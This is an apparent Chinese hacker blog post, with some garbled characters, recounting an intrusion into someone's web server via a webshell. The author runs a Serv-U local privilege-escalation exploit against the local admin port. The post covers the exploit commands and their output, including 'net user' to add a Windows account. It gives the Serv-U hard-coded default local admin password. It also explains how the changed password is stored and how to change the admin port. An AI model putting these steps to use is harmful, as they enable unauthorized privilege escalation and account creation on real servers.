今天獲得一個webshell.發(fā)現(xiàn)了serv-u目錄.看了下ServUDaemon.ini
[GLOBAL]
Version=6.0.0.2
OpenFilesDownloadMode=Exclusive
PacketTimeOut=300
LocalSetupPassword=ah6A0ED50ADD0A516DA36992DB43F3AA39
6.0.0.2版的.曾經(jīng)看到哪說6.0版的默認本地管理帳號和密碼依舊是原來那個.可又好像聽誰說過6版的密碼已經(jīng)改了..
呵.這里發(fā)現(xiàn).多出了一行Localsetuppassword.有種不詳?shù)念A(yù)感.難道原來的默認密碼已經(jīng)通過它來設(shè)置了?加了MD5,算算純數(shù)字倒還是可以.機會渺茫..
試試能不能寫入...顯示權(quán)限不足(一切都在預(yù)料之內(nèi)).OK試試默認帳戶和密碼吧.
上傳了xiaolu的那個serv-u權(quán)限提升工具
netstat -an |find "43958"
TCP 127.0.0.1:43958 0.0.0.0:0 LISTENING
嗯,是這個口.
執(zhí)行命令
D:/web/www/XXXX_com/serv-u.exe 43958 "net user xiaoqi amen. /add "
******************************************************
Serv-u <3.x Local Exploit by xiaolu
>221 Serv-U FTP Server v6.0 for WinSock ready...
>331 User name okay, need password.
******************************************************
#l@$ak#.lk;0@P
>530 Not logged in.
******************************************************
看到530,心涼了一下,這么說來默認密碼被改了.
上群里想獲得一下確認.Superhei給了個很好的思路.下載主程序用UEDIT查看密碼.
serv-u 6.0版之前要修改默認密碼也是同樣的方法,而且密碼長度要求同樣要求是14位(用其他字符替換#l@$ak#.lk;0@P)..
打開ServUAdmin.exe查了下,發(fā)現(xiàn)密碼依舊是#l@$ak#.lk;0@P(特地復(fù)制到記事本觀察,防止0/O l/1等字符混淆).確實沒有變.
那么,看來Serv-u已經(jīng)不依靠它來驗證了?
為了找出真像.下載了一個Serv-U 6.0.0.2版(未裝漢化,未破解,防止低版本漢化及破解補丁)
之前就在想,為什么Serv-U不可以提供一個讓管理員修改密碼的地方了?多少個服務(wù)器OVER的責(zé)任在Serv-U上啊?
好!這次來了,剛打開serv-u admin,發(fā)現(xiàn)在"停止服務(wù)"下面多了一個"設(shè)置更改密碼"的按鈕.
再來看看ServUDaemon.ini,除了版本改變了以外,與原來并沒有不同之處.
回到控制臺點開"設(shè)置更改密碼"要求輸入舊密碼,新密碼,確認.舊密碼?舊密碼是什么?#l@$ak#.lk;0@P嗎?
提示密碼不正確..怪了.試了下空密碼...正確..這可把我郁悶了.難道在Serv-U 6.0.0.2里L(fēng)ocalAdministrator的密碼就是空???
把xiaolu的權(quán)限提升工具拿來改了下,把密碼改成空.編譯好重新傳了上去.
執(zhí)行命令
D:/web/www/XXXX_com/serv-u2.exe 43958 "net user xiaoqi amen. /add "
******************************************************
Serv-u <3.x Local Exploit by xiaolu
>221 Serv-U FTP Server v6.0 for WinSock ready...
>331 User name okay, need password.
******************************************************
>530 Not logged in.
******************************************************
依然是530.呵..真是在做夢啊我.不過這次失敗并不能代表默認密碼不為空(因為這臺機器的配置文件中有LocalSetupPassword=)
好的.回過頭,看了下我機器上的ServUDaemon.ini,果然多了一行Localsetuppassword=xxxxxxx,看來確是剛才配置密碼的MD5了.把我機器上Serv-u的密碼改成空的(竟然允許我空的)再用這個serv-u2.exe試了下.不行..530,腦中突然閃過,難道"空"就是#l@$ak#.lk;0@P
操起serv-u.exe,yeah!成功.
到這里我們要開始懷疑一個問題了,如果修改了密碼,那么就需要進行二次驗證了?一次是#l@$ak#.lk;0@P 一次是修改完的密碼.
呵..興沖沖地跟superhei說了句"二次驗證",修改了下那個權(quán)限提升工具,把其中的密碼改為我在Serv-U中設(shè)置的密碼,連上了.證明了沒有進行二次驗證.
總結(jié)一下,在Serv-U 6.0.0.2版本中,初始密碼依舊是#l@$ak#.lk;0@P 但可以很方便地在Serv-U admin控制臺修改密碼,修改完密碼,配置保存在ServUDaemon.ini的LocalSetupPassword=中.
原來的#l@$ak#.lk;0@P依舊保存只有當(dāng)密碼為空時使用.
另:要修改本地管理端口.只需要在ServUDaemon.ini中的[global]里加上一行LocalSetupPortNo=端口號,既可
btw: 這些沒有技術(shù)含量的東西,希望大家多多原諒,原本寫的一些東西只是想丟在blog里自己安慰安慰,大家轉(zhuǎn)載完實在是折煞我了.
